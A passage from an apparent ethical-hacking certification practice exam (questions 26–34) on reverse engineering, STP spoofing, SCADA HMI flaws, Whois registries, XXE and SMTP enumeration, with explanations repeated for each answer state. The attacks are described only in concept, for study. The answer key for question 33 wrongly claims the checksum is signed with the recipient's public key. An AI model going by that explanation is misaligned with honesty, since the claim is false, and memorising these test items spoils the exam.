of the network‘s administrator or owner, thereby providing unauthorized wireless access to the network‘s wired infrastructure. Most of the time, rogue APs are set up by employees who want wireless access when none is available.
Question 26 of 65
26. Question
The company hired a cybersecurity specialist to conduct an audit of their mobile application. On the first day of work, the specialist suggested starting with the fact that he would extract the source code of a mobile application and disassemble the application to analyze its design flaws. He is sure that using this technique, he can fix bugs in the application, discover underlying vulnerabilities, and improve defence strategies against attacks. Which of the following techniques will the specialist use?
Correct
https://en.wikipedia.org/wiki/Reverse_engineering https://securitytoday.com/articles/2019/02/26/reverse-engineering-is-one-of-your-best-weapons-in-the-fight-against-cyberattacks.aspx Reverse engineering (also known as backwards engineering or back engineering) is a process or method through the application of which one attempts to understand through deductive reasoning how a device, process, system, or piece of software accomplishes a task with very little (if any) insight into exactly how it does so. Security experts can apply reverse engineering themselves to understand how hard it is to hack certain software. If it turns out to be a breeze, experts can provide recommendations on ways to complicate matters for a potential hacker. This technique can be especially useful for security software developers who work in a wide range of data formats and protocols, conduct lots of research for client issues, and ensure codes compatibility with third-party software. Incorrect answers: Application sandboxing https://en.wikipedia.org/wiki/Sandbox_(computer_security) A sandbox (including application sandboxing) is a security mechanism for separating running programs, usually in an effort to mitigate system failures and/or software vulnerabilities from spreading. It is often used to execute untested or untrusted programs or code, possibly from unverified or untrusted third parties, suppliers, users or websites, without risking harm to the host machine or operating system. A sandbox typically provides a tightly controlled set of resources for guest programs to run in, such as storage and memory scratch space. Network access, the ability to inspect the host system, or read from input devices are usually disallowed or heavily restricted. Jailbreaking https://en.wikipedia.org/wiki/Jailbreaking_of_Apple_devices Jailbreaking refers to privilege escalation on an Apple device to remove software restrictions imposed by Apple on iOS operating systems. Typically it is done through a series of kernel patches. A jailbroken device permits root access within the operating system and provides the opportunity to install software not available through the iOS App Store. Different devices and versions are exploited with a variety of tools. Apple views jailbreaking as a violation of the end-user license agreement, and strongly cautions device owners from attempting to achieve root access through the exploitation of vulnerabilities. Rooting https://en.wikipedia.org/wiki/Rooting_(Android) Rooting is the process of allowing users of the Android mobile operating system to attain privileged control (known as root access) over various Android subsystems. As Android is based on a modified version of the Linux kernel, rooting an Android device gives similar access to administrative (superuser) permissions as on Linux or any other Unix-like operating system such as FreeBSD or macOS.
Incorrect
https://en.wikipedia.org/wiki/Reverse_engineering https://securitytoday.com/articles/2019/02/26/reverse-engineering-is-one-of-your-best-weapons-in-the-fight-against-cyberattacks.aspx Reverse engineering (also known as backwards engineering or back engineering) is a process or method through the application of which one attempts to understand through deductive reasoning how a device, process, system, or piece of software accomplishes a task with very little (if any) insight into exactly how it does so. Security experts can apply reverse engineering themselves to understand how hard it is to hack certain software. If it turns out to be a breeze, experts can provide recommendations on ways to complicate matters for a potential hacker. This technique can be especially useful for security software developers who work in a wide range of data formats and protocols, conduct lots of research for client issues, and ensure codes compatibility with third-party software. Incorrect answers: Application sandboxing https://en.wikipedia.org/wiki/Sandbox_(computer_security) A sandbox (including application sandboxing) is a security mechanism for separating running programs, usually in an effort to mitigate system failures and/or software vulnerabilities from spreading. It is often used to execute untested or untrusted programs or code, possibly from unverified or untrusted third parties, suppliers, users or websites, without risking harm to the host machine or operating system. A sandbox typically provides a tightly controlled set of resources for guest programs to run in, such as storage and memory scratch space. Network access, the ability to inspect the host system, or read from input devices are usually disallowed or heavily restricted. Jailbreaking https://en.wikipedia.org/wiki/Jailbreaking_of_Apple_devices Jailbreaking refers to privilege escalation on an Apple device to remove software restrictions imposed by Apple on iOS operating systems. Typically it is done through a series of kernel patches. A jailbroken device permits root access within the operating system and provides the opportunity to install software not available through the iOS App Store. Different devices and versions are exploited with a variety of tools. Apple views jailbreaking as a violation of the end-user license agreement, and strongly cautions device owners from attempting to achieve root access through the exploitation of vulnerabilities. Rooting https://en.wikipedia.org/wiki/Rooting_(Android) Rooting is the process of allowing users of the Android mobile operating system to attain privileged control (known as root access) over various Android subsystems. As Android is based on a modified version of the Linux kernel, rooting an Android device gives similar access to administrative (superuser) permissions as on Linux or any other Unix-like operating system such as FreeBSD or macOS.
Unattempted
https://en.wikipedia.org/wiki/Reverse_engineering https://securitytoday.com/articles/2019/02/26/reverse-engineering-is-one-of-your-best-weapons-in-the-fight-against-cyberattacks.aspx Reverse engineering (also known as backwards engineering or back engineering) is a process or method through the application of which one attempts to understand through deductive reasoning how a device, process, system, or piece of software accomplishes a task with very little (if any) insight into exactly how it does so. Security experts can apply reverse engineering themselves to understand how hard it is to hack certain software. If it turns out to be a breeze, experts can provide recommendations on ways to complicate matters for a potential hacker. This technique can be especially useful for security software developers who work in a wide range of data formats and protocols, conduct lots of research for client issues, and ensure codes compatibility with third-party software. Incorrect answers: Application sandboxing https://en.wikipedia.org/wiki/Sandbox_(computer_security) A sandbox (including application sandboxing) is a security mechanism for separating running programs, usually in an effort to mitigate system failures and/or software vulnerabilities from spreading. It is often used to execute untested or untrusted programs or code, possibly from unverified or untrusted third parties, suppliers, users or websites, without risking harm to the host machine or operating system. A sandbox typically provides a tightly controlled set of resources for guest programs to run in, such as storage and memory scratch space. Network access, the ability to inspect the host system, or read from input devices are usually disallowed or heavily restricted. Jailbreaking https://en.wikipedia.org/wiki/Jailbreaking_of_Apple_devices Jailbreaking refers to privilege escalation on an Apple device to remove software restrictions imposed by Apple on iOS operating systems. Typically it is done through a series of kernel patches. A jailbroken device permits root access within the operating system and provides the opportunity to install software not available through the iOS App Store. Different devices and versions are exploited with a variety of tools. Apple views jailbreaking as a violation of the end-user license agreement, and strongly cautions device owners from attempting to achieve root access through the exploitation of vulnerabilities. Rooting https://en.wikipedia.org/wiki/Rooting_(Android) Rooting is the process of allowing users of the Android mobile operating system to attain privileged control (known as root access) over various Android subsystems. As Android is based on a modified version of the Linux kernel, rooting an Android device gives similar access to administrative (superuser) permissions as on Linux or any other Unix-like operating system such as FreeBSD or macOS.
Question 27 of 65
27. Question
Identify the wrong answer in terms of Range:
802.11a – 150 ft
802.11b – 150 ft
802.11n – 150 ft
802.16 (WiMax) – 30 miles
Correct
Incorrect
Unattempted
Question 28 of 65
28. Question
Ivan, the black hat hacker, plugged in a rogue switch to an unused port in the LAN with a priority lower than any other switch in the network so that he could make it a root bridge that will later allow him to sniff all the traffic in the target‘s network. What attack did Ivan perform?
Correct
https://howdoesinternetwork.com/2012/stp-attack
An STP attack involves an attacker spoofing the root bridge in the topology. The attacker broadcasts out an STP configuration/topology change BPDU in an attempt to force an STP recalculation. The BPDU sent out announces that the attacker‘s system has a lower bridge priority. The attacker can then see a variety of frames forwarded from other switches to it. STP recalculation may also cause a denial-of-service (DoS) condition on the network by causing an interruption of 30 to 45 seconds each time the root bridge changes.
Incorrect answers:
ARP spoofing attack https://en.wikipedia.org/wiki/ARP_spoofing
ARP spoofing, ARP cache poisoning, or ARP poison routing, is a technique by which an attacker sends (spoofed) Address Resolution Protocol (ARP) messages onto a local area network. Generally, the aim is to associate the attacker‘s MAC address with the IP address of another host, such as the default gateway, causing any traffic meant for that IP address to be sent to the attacker instead.
DNS poisoning attack https://en.wikipedia.org/wiki/DNS_spoofing
DNS spoofing, also referred to as DNS cache poisoning, is a form of computer security hacking in which corrupt Domain Name System data is introduced into the DNS resolver‘s cache, causing the name server to return an incorrect result record, e.g. an IP address. This results in traffic being diverted to the attacker‘s computer (or any other computer).
VLAN hopping https://en.wikipedia.org/wiki/VLAN_hopping
VLAN hopping is a computer security exploit, a method of attacking networked resources on a virtual LAN (VLAN). The basic concept behind all VLAN hopping attacks is for an attacking host on a VLAN to gain access to traffic on other VLANs that would normally not be accessible. There are two primary methods of VLAN hopping: switch spoofing and double tagging. Both attack vectors can be mitigated with proper switch port configuration.
Incorrect
https://howdoesinternetwork.com/2012/stp-attack
An STP attack involves an attacker spoofing the root bridge in the topology. The attacker broadcasts out an STP configuration/topology change BPDU in an attempt to force an STP recalculation. The BPDU sent out announces that the attacker‘s system has a lower bridge priority. The attacker can then see a variety of frames forwarded from other switches to it. STP recalculation may also cause a denial-of-service (DoS) condition on the network by causing an interruption of 30 to 45 seconds each time the root bridge changes.
Incorrect answers:
ARP spoofing attack https://en.wikipedia.org/wiki/ARP_spoofing
ARP spoofing, ARP cache poisoning, or ARP poison routing, is a technique by which an attacker sends (spoofed) Address Resolution Protocol (ARP) messages onto a local area network. Generally, the aim is to associate the attacker‘s MAC address with the IP address of another host, such as the default gateway, causing any traffic meant for that IP address to be sent to the attacker instead.
DNS poisoning attack https://en.wikipedia.org/wiki/DNS_spoofing
DNS spoofing, also referred to as DNS cache poisoning, is a form of computer security hacking in which corrupt Domain Name System data is introduced into the DNS resolver‘s cache, causing the name server to return an incorrect result record, e.g. an IP address. This results in traffic being diverted to the attacker‘s computer (or any other computer).
VLAN hopping https://en.wikipedia.org/wiki/VLAN_hopping
VLAN hopping is a computer security exploit, a method of attacking networked resources on a virtual LAN (VLAN). The basic concept behind all VLAN hopping attacks is for an attacking host on a VLAN to gain access to traffic on other VLANs that would normally not be accessible. There are two primary methods of VLAN hopping: switch spoofing and double tagging. Both attack vectors can be mitigated with proper switch port configuration.
Unattempted
https://howdoesinternetwork.com/2012/stp-attack
An STP attack involves an attacker spoofing the root bridge in the topology. The attacker broadcasts out an STP configuration/topology change BPDU in an attempt to force an STP recalculation. The BPDU sent out announces that the attacker‘s system has a lower bridge priority. The attacker can then see a variety of frames forwarded from other switches to it. STP recalculation may also cause a denial-of-service (DoS) condition on the network by causing an interruption of 30 to 45 seconds each time the root bridge changes.
Incorrect answers:
ARP spoofing attack https://en.wikipedia.org/wiki/ARP_spoofing
ARP spoofing, ARP cache poisoning, or ARP poison routing, is a technique by which an attacker sends (spoofed) Address Resolution Protocol (ARP) messages onto a local area network. Generally, the aim is to associate the attacker‘s MAC address with the IP address of another host, such as the default gateway, causing any traffic meant for that IP address to be sent to the attacker instead.
DNS poisoning attack https://en.wikipedia.org/wiki/DNS_spoofing
DNS spoofing, also referred to as DNS cache poisoning, is a form of computer security hacking in which corrupt Domain Name System data is introduced into the DNS resolver‘s cache, causing the name server to return an incorrect result record, e.g. an IP address. This results in traffic being diverted to the attacker‘s computer (or any other computer).
VLAN hopping https://en.wikipedia.org/wiki/VLAN_hopping
VLAN hopping is a computer security exploit, a method of attacking networked resources on a virtual LAN (VLAN). The basic concept behind all VLAN hopping attacks is for an attacking host on a VLAN to gain access to traffic on other VLANs that would normally not be accessible. There are two primary methods of VLAN hopping: switch spoofing and double tagging. Both attack vectors can be mitigated with proper switch port configuration.
Question 29 of 65
29. Question
Black-hat hacker Ivan attacked the SCADA system of the industrial water facility. During the exploration process, he discovered that outdated equipment was being used, the human-machine interface (HMI) was directly connected to the Internet and did not have any security tools or authentication mechanism. This allowed Ivan to control the system and influence all processes (including water pressure and temperature). What category does this vulnerability belong to?
Correct
https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/the-state-of-scada-hmi-vulnerabilities
Most SCADA / ICS equipment has a dedicated system for managing and monitoring industrial systems. Most people in the industry call this a human-machine interface or HMI. This system is essential for managing industrial systems, but it can also be an important vector for attackers. If an attacker could endanger the HMI, the attacker owns your industrial network. These systems have been compromised in at least two ways: protocol attacks and HMI attacks.
The major areas where SCADA software vulnerabilities occur as you can see in the graphic below are, respectively:
– Memory corruption.
– Credential management.
– Lack of authentication/authorization and insecure defaults.
– Code injection.
– A big chunk of other areas.
Memory corruption
The vulnerabilities in this category are code security issues that include out-of-bounds read/write vulnerabilities and heap- and stack-based buffer overflow.
Credential management
Includes all vulnerabilities from not protecting credentials enough and storing passwords in a recoverable format to the use of hard-coded passwords.
Lack of authentication/authorization and insecure defaults
The vulnerabilities in this category include transmission of confidential information in cleartext, insecure defaults, missing encryption, and insecure ActiveX controls used for scripting.
NOTE: The situation in the question relates to this vulnerability because the problem is not just in a simple password or in its insecure storage, but in the complete absence of the authentication mechanism itself.
Code injection
The vulnerabilities in this category include common code injections such as SQL, OS, command, and some domain-specific injections.
Incorrect
https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/the-state-of-scada-hmi-vulnerabilities
Most SCADA / ICS equipment has a dedicated system for managing and monitoring industrial systems. Most people in the industry call this a human-machine interface or HMI. This system is essential for managing industrial systems, but it can also be an important vector for attackers. If an attacker could endanger the HMI, the attacker owns your industrial network. These systems have been compromised in at least two ways: protocol attacks and HMI attacks.
The major areas where SCADA software vulnerabilities occur as you can see in the graphic below are, respectively:
– Memory corruption.
– Credential management.
– Lack of authentication/authorization and insecure defaults.
– Code injection.
– A big chunk of other areas.
Memory corruption
The vulnerabilities in this category are code security issues that include out-of-bounds read/write vulnerabilities and heap- and stack-based buffer overflow.
Credential management
Includes all vulnerabilities from not protecting credentials enough and storing passwords in a recoverable format to the use of hard-coded passwords.
Lack of authentication/authorization and insecure defaults
The vulnerabilities in this category include transmission of confidential information in cleartext, insecure defaults, missing encryption, and insecure ActiveX controls used for scripting.
NOTE: The situation in the question relates to this vulnerability because the problem is not just in a simple password or in its insecure storage, but in the complete absence of the authentication mechanism itself.
Code injection
The vulnerabilities in this category include common code injections such as SQL, OS, command, and some domain-specific injections.
Unattempted
https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/the-state-of-scada-hmi-vulnerabilities
Most SCADA / ICS equipment has a dedicated system for managing and monitoring industrial systems. Most people in the industry call this a human-machine interface or HMI. This system is essential for managing industrial systems, but it can also be an important vector for attackers. If an attacker could endanger the HMI, the attacker owns your industrial network. These systems have been compromised in at least two ways: protocol attacks and HMI attacks.
The major areas where SCADA software vulnerabilities occur as you can see in the graphic below are, respectively:
– Memory corruption.
– Credential management.
– Lack of authentication/authorization and insecure defaults.
– Code injection.
– A big chunk of other areas.
Memory corruption
The vulnerabilities in this category are code security issues that include out-of-bounds read/write vulnerabilities and heap- and stack-based buffer overflow.
Credential management
Includes all vulnerabilities from not protecting credentials enough and storing passwords in a recoverable format to the use of hard-coded passwords.
Lack of authentication/authorization and insecure defaults
The vulnerabilities in this category include transmission of confidential information in cleartext, insecure defaults, missing encryption, and insecure ActiveX controls used for scripting.
NOTE: The situation in the question relates to this vulnerability because the problem is not just in a simple password or in its insecure storage, but in the complete absence of the authentication mechanism itself.
Code injection
The vulnerabilities in this category include common code injections such as SQL, OS, command, and some domain-specific injections.
Question 30 of 65
30. Question
Whois services allow you to get a massive amount of valuable information at the stage of reconnaissance. Depending on the target‘s location, they receive data from one of the five largest regional Internet registries (RIR). Which of the following RIRs should the Whois service contact if you want to get information about an IP address registered in France?
Correct
https://en.wikipedia.org/wiki/Regional_Internet_registry
A regional Internet registry (RIR) is an organization that manages the allocation and registration of Internet number resources within a region of the world. Internet number resources include IP addresses and autonomous system (AS) numbers.
The regional Internet registry system evolved over time, eventually dividing the responsibility for management to a registry for each of five regions of the world. The regional Internet registries are informally liaised through the unincorporated Number Resource Organization (NRO), which is a coordinating body to act on matters of global importance.
· American Registry for Internet Numbers (ARIN)
· RIPE Network Coordination Centre (RIPE NCC)
· Asia-Pacific Network Information Centre (APNIC)
· Latin American and Caribbean Network Information Centre (LACNIC)
· African Network Information Centre (AFRINIC)
NOTE: There are also national RIRs https://en.wikipedia.org/wiki/National_Internet_registry
· The Japan Network Information Center (JPNIC)
· The Korea Internet & Security Agency (KISA/KRNIC)
· China Internet Network Information Center (CNNIC)
· Asosiasi Penyelenggara Jasa Internet Indonesia (APJII)
· Taiwan Network Information Center (TWNIC)
· Vietnam Internet Network Information Center (VNNIC)
· Indian Registry for Internet Names and Numbers (IRINN)
Incorrect
https://en.wikipedia.org/wiki/Regional_Internet_registry
A regional Internet registry (RIR) is an organization that manages the allocation and registration of Internet number resources within a region of the world. Internet number resources include IP addresses and autonomous system (AS) numbers.
The regional Internet registry system evolved over time, eventually dividing the responsibility for management to a registry for each of five regions of the world. The regional Internet registries are informally liaised through the unincorporated Number Resource Organization (NRO), which is a coordinating body to act on matters of global importance.
· American Registry for Internet Numbers (ARIN)
· RIPE Network Coordination Centre (RIPE NCC)
· Asia-Pacific Network Information Centre (APNIC)
· Latin American and Caribbean Network Information Centre (LACNIC)
· African Network Information Centre (AFRINIC)
NOTE: There are also national RIRs https://en.wikipedia.org/wiki/National_Internet_registry
· The Japan Network Information Center (JPNIC)
· The Korea Internet & Security Agency (KISA/KRNIC)
· China Internet Network Information Center (CNNIC)
· Asosiasi Penyelenggara Jasa Internet Indonesia (APJII)
· Taiwan Network Information Center (TWNIC)
· Vietnam Internet Network Information Center (VNNIC)
· Indian Registry for Internet Names and Numbers (IRINN)
Unattempted
https://en.wikipedia.org/wiki/Regional_Internet_registry
A regional Internet registry (RIR) is an organization that manages the allocation and registration of Internet number resources within a region of the world. Internet number resources include IP addresses and autonomous system (AS) numbers.
The regional Internet registry system evolved over time, eventually dividing the responsibility for management to a registry for each of five regions of the world. The regional Internet registries are informally liaised through the unincorporated Number Resource Organization (NRO), which is a coordinating body to act on matters of global importance.
· American Registry for Internet Numbers (ARIN)
· RIPE Network Coordination Centre (RIPE NCC)
· Asia-Pacific Network Information Centre (APNIC)
· Latin American and Caribbean Network Information Centre (LACNIC)
· African Network Information Centre (AFRINIC)
NOTE: There are also national RIRs https://en.wikipedia.org/wiki/National_Internet_registry
· The Japan Network Information Center (JPNIC)
· The Korea Internet & Security Agency (KISA/KRNIC)
· China Internet Network Information Center (CNNIC)
· Asosiasi Penyelenggara Jasa Internet Indonesia (APJII)
· Taiwan Network Information Center (TWNIC)
· Vietnam Internet Network Information Center (VNNIC)
· Indian Registry for Internet Names and Numbers (IRINN)
Question 31 of 65
31. Question
Have you spent a lot of time and money on creating photo materials for your business? You probably don‘t want anyone else to use them. But you don‘t need to hire a cool hacker to solve this problem. There is a reasonably simple method using search engines to search for photographs, profile pictures, and memes.
What method are we talking about?
Reverse image search is a content-based image retrieval (CBIR) query technique that involves providing the CBIR system with a sample image that it will then base its search upon; in terms of information retrieval, the sample image is what formulates a search query. In particular, reverse image search is characterized by a lack of search terms. This effectively removes the need for a user to guess at keywords or terms that may or may not return a correct result. Reverse image search also allows users to discover content that is related to a specific sample image, popularity of an image, and discover manipulated versions and derivative works.
Incorrect answers:
Google advanced search https://www.google.com/advanced_search
Google Advanced Search is a more detailed method of finding information on Google. It uses a variety of Google search operators that consists of special characters and commands also known as advanced operators that goes beyond a normal Google search.
Metasearch engines https://en.wikipedia.org/wiki/Metasearch_engine
A metasearch engine (or search aggregator) is an online information retrieval tool that uses the data of a web search engine to produce its own results. Metasearch engines take input from a user and immediately query search engines for results. Sufficient data is gathered, ranked, and presented to the users.
Google dorking https://en.wikipedia.org/wiki/Google_hacking
Google hacking, also named Google dorking, is a hacker technique that uses Google Search and other Google applications to find security holes in the configuration and computer code that websites are using. Google dorking could also be used for OSINT.
Reverse image search is a content-based image retrieval (CBIR) query technique that involves providing the CBIR system with a sample image that it will then base its search upon; in terms of information retrieval, the sample image is what formulates a search query. In particular, reverse image search is characterized by a lack of search terms. This effectively removes the need for a user to guess at keywords or terms that may or may not return a correct result. Reverse image search also allows users to discover content that is related to a specific sample image, popularity of an image, and discover manipulated versions and derivative works.
Incorrect answers:
Google advanced search https://www.google.com/advanced_search
Google Advanced Search is a more detailed method of finding information on Google. It uses a variety of Google search operators that consists of special characters and commands also known as advanced operators that goes beyond a normal Google search.
Metasearch engines https://en.wikipedia.org/wiki/Metasearch_engine
A metasearch engine (or search aggregator) is an online information retrieval tool that uses the data of a web search engine to produce its own results. Metasearch engines take input from a user and immediately query search engines for results. Sufficient data is gathered, ranked, and presented to the users.
Google dorking https://en.wikipedia.org/wiki/Google_hacking
Google hacking, also named Google dorking, is a hacker technique that uses Google Search and other Google applications to find security holes in the configuration and computer code that websites are using. Google dorking could also be used for OSINT.
Reverse image search is a content-based image retrieval (CBIR) query technique that involves providing the CBIR system with a sample image that it will then base its search upon; in terms of information retrieval, the sample image is what formulates a search query. In particular, reverse image search is characterized by a lack of search terms. This effectively removes the need for a user to guess at keywords or terms that may or may not return a correct result. Reverse image search also allows users to discover content that is related to a specific sample image, popularity of an image, and discover manipulated versions and derivative works.
Incorrect answers:
Google advanced search https://www.google.com/advanced_search
Google Advanced Search is a more detailed method of finding information on Google. It uses a variety of Google search operators that consists of special characters and commands also known as advanced operators that goes beyond a normal Google search.
Metasearch engines https://en.wikipedia.org/wiki/Metasearch_engine
A metasearch engine (or search aggregator) is an online information retrieval tool that uses the data of a web search engine to produce its own results. Metasearch engines take input from a user and immediately query search engines for results. Sufficient data is gathered, ranked, and presented to the users.
Google dorking https://en.wikipedia.org/wiki/Google_hacking
Google hacking, also named Google dorking, is a hacker technique that uses Google Search and other Google applications to find security holes in the configuration and computer code that websites are using. Google dorking could also be used for OSINT.
Question 32 of 65
32. Question
In which of the following attacks is the line above injected?
Correct
https://portswigger.net/web-security/xxe
XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application‘s processing of XML data. It often allows an attacker to view files on the application server filesystem and interact with any back-end or external systems that the application can access.
In some situations, an attacker can escalate an XXE attack to compromise the underlying server or other back-end infrastructure by leveraging the XXE vulnerability to perform server-side request forgery (SSRF) attacks.
Incorrect answers:
SQLi https://en.wikipedia.org/wiki/SQL_injection
SQL injection is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application‘s software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.
SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause repudiation issues such as voiding transactions or changing balances, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.
XXS https://en.wikipedia.org/wiki/Cross-site_scripting
Cross-site scripting (XSS) is a type of security vulnerability that can be found in some web applications. XSS attacks enable attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy. XSS effects vary in range from petty nuisance to significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site‘s owner network.
IDOR https://portswigger.net/web-security/access-control/idor
Insecure direct object references (IDOR) are a type of access control vulnerability that arises when an application uses user-supplied input to access objects directly. However, it is just one example of many access control implementation mistakes that can lead to access controls being circumvented. IDOR vulnerabilities are most commonly associated with horizontal privilege escalation, but they can also arise in relation to vertical privilege escalation
Incorrect
https://portswigger.net/web-security/xxe
XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application‘s processing of XML data. It often allows an attacker to view files on the application server filesystem and interact with any back-end or external systems that the application can access.
In some situations, an attacker can escalate an XXE attack to compromise the underlying server or other back-end infrastructure by leveraging the XXE vulnerability to perform server-side request forgery (SSRF) attacks.
Incorrect answers:
SQLi https://en.wikipedia.org/wiki/SQL_injection
SQL injection is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application‘s software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.
SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause repudiation issues such as voiding transactions or changing balances, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.
XXS https://en.wikipedia.org/wiki/Cross-site_scripting
Cross-site scripting (XSS) is a type of security vulnerability that can be found in some web applications. XSS attacks enable attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy. XSS effects vary in range from petty nuisance to significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site‘s owner network.
IDOR https://portswigger.net/web-security/access-control/idor
Insecure direct object references (IDOR) are a type of access control vulnerability that arises when an application uses user-supplied input to access objects directly. However, it is just one example of many access control implementation mistakes that can lead to access controls being circumvented. IDOR vulnerabilities are most commonly associated with horizontal privilege escalation, but they can also arise in relation to vertical privilege escalation
Unattempted
https://portswigger.net/web-security/xxe
XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application‘s processing of XML data. It often allows an attacker to view files on the application server filesystem and interact with any back-end or external systems that the application can access.
In some situations, an attacker can escalate an XXE attack to compromise the underlying server or other back-end infrastructure by leveraging the XXE vulnerability to perform server-side request forgery (SSRF) attacks.
Incorrect answers:
SQLi https://en.wikipedia.org/wiki/SQL_injection
SQL injection is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application‘s software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.
SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause repudiation issues such as voiding transactions or changing balances, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.
XXS https://en.wikipedia.org/wiki/Cross-site_scripting
Cross-site scripting (XSS) is a type of security vulnerability that can be found in some web applications. XSS attacks enable attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy. XSS effects vary in range from petty nuisance to significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site‘s owner network.
IDOR https://portswigger.net/web-security/access-control/idor
Insecure direct object references (IDOR) are a type of access control vulnerability that arises when an application uses user-supplied input to access objects directly. However, it is just one example of many access control implementation mistakes that can lead to access controls being circumvented. IDOR vulnerabilities are most commonly associated with horizontal privilege escalation, but they can also arise in relation to vertical privilege escalation
Question 33 of 65
33. Question
John sends an email to his colleague Angela and wants to ensure that the message will not be changed during the delivery process. He creates a checksum of the message and encrypts it using asymmetric cryptography. What key did John use to encrypt the checksum?
Correct
The correct answer is:
B. Angela’s public key
Here’s why:
Checksum: John creates a checksum (a hash) of the message to detect any alterations during transmission.
Asymmetric Cryptography: He uses asymmetric cryptography for encryption, which involves a public-private key pair.
Explanation:
In asymmetric cryptography, data encrypted with one key (public key) can only be decrypted with the other key (private key) in the pair. This ensures confidentiality:
Checksum Encryption: John encrypts the checksum using Angela’s public key. This ensures only Angela, who has the corresponding private key, can decrypt the checksum.
Message Integrity: Upon receiving the email, Angela can decrypt the checksum using her private key. She can then calculate a checksum of the received message and compare it to the decrypted checksum. If they match, it indicates the message hasn’t been tampered with during delivery.
Incorrect Options:
A. His own private key: Using his own private key wouldn’t allow Angela to decrypt the checksum, rendering the verification process impossible.
C. Angela’s private key: Angela’s private key is for decryption, not encryption. John needs a key that only Angela has access to for decryption purposes.
D. His own public key: Encrypting with his own public key wouldn’t achieve confidentiality or message integrity. Anyone with the corresponding private key (John himself) could decrypt the checksum, making it pointless.
By using Angela’s public key, John ensures only Angela can decrypt the checksum and verify the message’s integrity. This approach safeguards the message from unauthorized modifications.
Incorrect
The correct answer is:
B. Angela’s public key
Here’s why:
Checksum: John creates a checksum (a hash) of the message to detect any alterations during transmission.
Asymmetric Cryptography: He uses asymmetric cryptography for encryption, which involves a public-private key pair.
Explanation:
In asymmetric cryptography, data encrypted with one key (public key) can only be decrypted with the other key (private key) in the pair. This ensures confidentiality:
Checksum Encryption: John encrypts the checksum using Angela’s public key. This ensures only Angela, who has the corresponding private key, can decrypt the checksum.
Message Integrity: Upon receiving the email, Angela can decrypt the checksum using her private key. She can then calculate a checksum of the received message and compare it to the decrypted checksum. If they match, it indicates the message hasn’t been tampered with during delivery.
Incorrect Options:
A. His own private key: Using his own private key wouldn’t allow Angela to decrypt the checksum, rendering the verification process impossible.
C. Angela’s private key: Angela’s private key is for decryption, not encryption. John needs a key that only Angela has access to for decryption purposes.
D. His own public key: Encrypting with his own public key wouldn’t achieve confidentiality or message integrity. Anyone with the corresponding private key (John himself) could decrypt the checksum, making it pointless.
By using Angela’s public key, John ensures only Angela can decrypt the checksum and verify the message’s integrity. This approach safeguards the message from unauthorized modifications.
Unattempted
The correct answer is:
B. Angela’s public key
Here’s why:
Checksum: John creates a checksum (a hash) of the message to detect any alterations during transmission.
Asymmetric Cryptography: He uses asymmetric cryptography for encryption, which involves a public-private key pair.
Explanation:
In asymmetric cryptography, data encrypted with one key (public key) can only be decrypted with the other key (private key) in the pair. This ensures confidentiality:
Checksum Encryption: John encrypts the checksum using Angela’s public key. This ensures only Angela, who has the corresponding private key, can decrypt the checksum.
Message Integrity: Upon receiving the email, Angela can decrypt the checksum using her private key. She can then calculate a checksum of the received message and compare it to the decrypted checksum. If they match, it indicates the message hasn’t been tampered with during delivery.
Incorrect Options:
A. His own private key: Using his own private key wouldn’t allow Angela to decrypt the checksum, rendering the verification process impossible.
C. Angela’s private key: Angela’s private key is for decryption, not encryption. John needs a key that only Angela has access to for decryption purposes.
D. His own public key: Encrypting with his own public key wouldn’t achieve confidentiality or message integrity. Anyone with the corresponding private key (John himself) could decrypt the checksum, making it pointless.
By using Angela’s public key, John ensures only Angela can decrypt the checksum and verify the message’s integrity. This approach safeguards the message from unauthorized modifications.
Question 34 of 65
34. Question
John, a black hacker, is trying to do an SMTP enumeration. What useful information can John gather during a Simple Mail Transfer Protocol enumeration?
Correct
https://info-savvy.com/what-is-enumeration/ SMTP is a service that can be found in most infrastructure penetration tests. This service can help the penetration tester to perform username enumeration via the EXPN and VRFY commands if these commands have not been disabled by the system administrator. The role of the EXPN command is to reveal the actual address of users aliases and lists of email and VRFY which can confirm the existence of names of valid users. The SMTP enumeration can be performed manually through utilities like telnet and netcat or automatically via a variety of tools like metasploit, nmap and smtp-user-enum.
Incorrect
